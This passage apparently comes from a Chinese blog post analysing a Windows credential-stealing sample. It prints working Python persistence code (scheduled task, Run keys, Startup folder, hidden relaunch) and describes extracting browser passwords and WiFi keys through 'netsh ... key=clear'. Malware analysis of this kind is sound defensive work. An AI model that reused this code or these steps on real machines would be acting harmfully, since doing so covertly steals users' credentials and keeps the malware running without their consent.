(self._create_scheduled_task, "scheduled_task"),
(self._add_to_user_run, "user_run"),
(self._add_to_system_run, "system_run"),
(self._add_to_startup_folder, "startup_folder")
]
for method, name in strategies:
try:
success = method() is True
results["steps"][name] = success
if success:
results["success"] = True
break # 成功则退出降级链
except Exception:
results["steps"][name] = False
return results
# ======================
# 🎯 统一调用接口(推荐方式)
# ======================
def install(target_script: Optional[str] = None) -> Dict[str, Any]:
"""
简洁接口:供其他 Python 文件一键调用
示例:
import silent_persistence
result = silent_persistence.install()
"""
try:
manager = SilentPersistence(target_script)
return manager.install()
except Exception as e:
return {
"success": False,
"error": str(e),
"timestamp": datetime.now().isoformat(),
"steps": {}
}
# ======================
# 主入口(静默运行)
# ======================
if __name__ == "__main__":
# 自动切换到 pythonw 防止弹窗
if sys.executable.endswith("python.exe"):
pythonw = sys.executable.replace("python.exe", "pythonw.exe")
if os.path.exists(pythonw):
try:
subprocess.Popen(
[pythonw, __file__],
creationflags=subprocess.CREATE_NO_WINDOW,
close_fds=True
)
sys.exit(0)
except:
pass # 继续使用 python.exe
# 执行安装
install()
4.代码分析
大模型分析结果:
该项目是一个针对 Windows 系统的红队(Red Team)凭证窃取与持久化工具,核心目标是在目标主机上静默提取敏感凭证信息,并通过多种方式实现持久化、数据加密和扩散,整体流程具备反沙箱检测、无痕执行、数据窃取、加密备份等特征 。
核心步骤(按执行顺序)
步骤 1:沙箱 / 虚拟机检测(反分析)
调用scanner1.py的scan_environment方法,检测是否运行在虚拟机 / 沙箱环境:
- 检测维度:BIOS 字符串、系统制造商、磁盘大小、CPU 核心数、内存大小、运行进程(如 VMware 工具)、MAC 地址、鼠标交互、调试器等;
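- 行为:设计意图是检测到沙箱 / 虚拟机后终止运行,避免被分析。但需要注意,在还原出的代码中,run_sandbox_detection 检测到沙箱时只是返回 False,主流程 run() 并没有检查这个返回值,后续步骤仍会继续执行(还原代码可能与原始样本存在出入,此处以动态分析结果为准)。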
步骤 2:静默持久化(自启动)
调用config_manager2.py的install方法,通过四级降级策略实现程序自启动(成功即停止降级):
- Level 1:创建隐藏计划任务;
- Level 2:添加到当前用户注册表 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run;
- Level 3:添加到系统注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(需管理员);
- Level 4:添加到用户启动文件夹(生成静默批处理文件);
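- 特征:部分字符串只做了 Base64 编码(属于简单混淆,并非真正的加密);脚本自称“无文件残留”,但从代码看,创建计划任务时会在临时目录写入 SilentAgentTask.xml(用后删除),Level 4 还会在启动文件夹留下 SilentAgentTask.bat;全程静默执行。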
步骤 3:敏感凭证提取(核心目的)
提取两类核心敏感信息,存入内存后生成结构化数据:
- 浏览器密码提取(Chrome/Edge):
  - 复制浏览器 Login Data 数据库到临时目录(避免文件锁定);
  - 从 Local State 文件提取 AES 密钥(DPAPI 解密);
  - 解密数据库中保存的网站账号密码(支持 AES-GCM / 旧版 DPAPI 加密);
  - 提取后删除临时数据库文件,避免痕迹。
- WiFi 密码提取:
  - 通过 netsh wlan show profiles 获取所有 WiFi 配置文件;
  - 执行 netsh wlan show profile name=xxx key=clear 提取明文密码;
  - 静默执行(CREATE_NO_WINDOW),避免弹窗。
步骤 4:数据加密与备份
- 生成 JSON 报告:将提取的凭证(浏览器 / WiFi)生成结构化 JSON 文件(临时目录);
- AES-256 加密压缩:用 pyzipper 将 JSON 打包为加密 ZIP(密码固定为 123456),并删除明文 JSON;
- 备份与转存:将加密 ZIP(redteam_creds_encrypted.zip)复制到当前用户桌面,并复制到所有可移动磁盘(U 盘)且设置隐藏属性,最后删除临时目录中的 ZIP。
5.动态分析
动态执行该程序,观察其行为。
观察进程树,可以看到样本通过 cmd.exe 获取系统基本信息(应对应 scanner1.py 中以 shell 方式执行的 wmic 查询);通过 schtasks.exe 创建计划任务,对应代码中持久化功能的第一项;通过 netsh.exe 获取已保存的 WiFi 配置及密码。

持久化:
在我的计算机上,计划任务没有创建成功,因此样本降级执行了持久化的第二项操作:在注册表启动项(HKEY_CURRENT_USER 下的 Run 键)中写入该样本的自启动项。


文件写入:
最后样本在桌面生成了加密压缩包 redteam_creds_encrypted.zip,用固定密码 123456 解压后得到 credentials.json 报告,里面是样本收集到的凭证信息。
更多推荐

所有评论(0)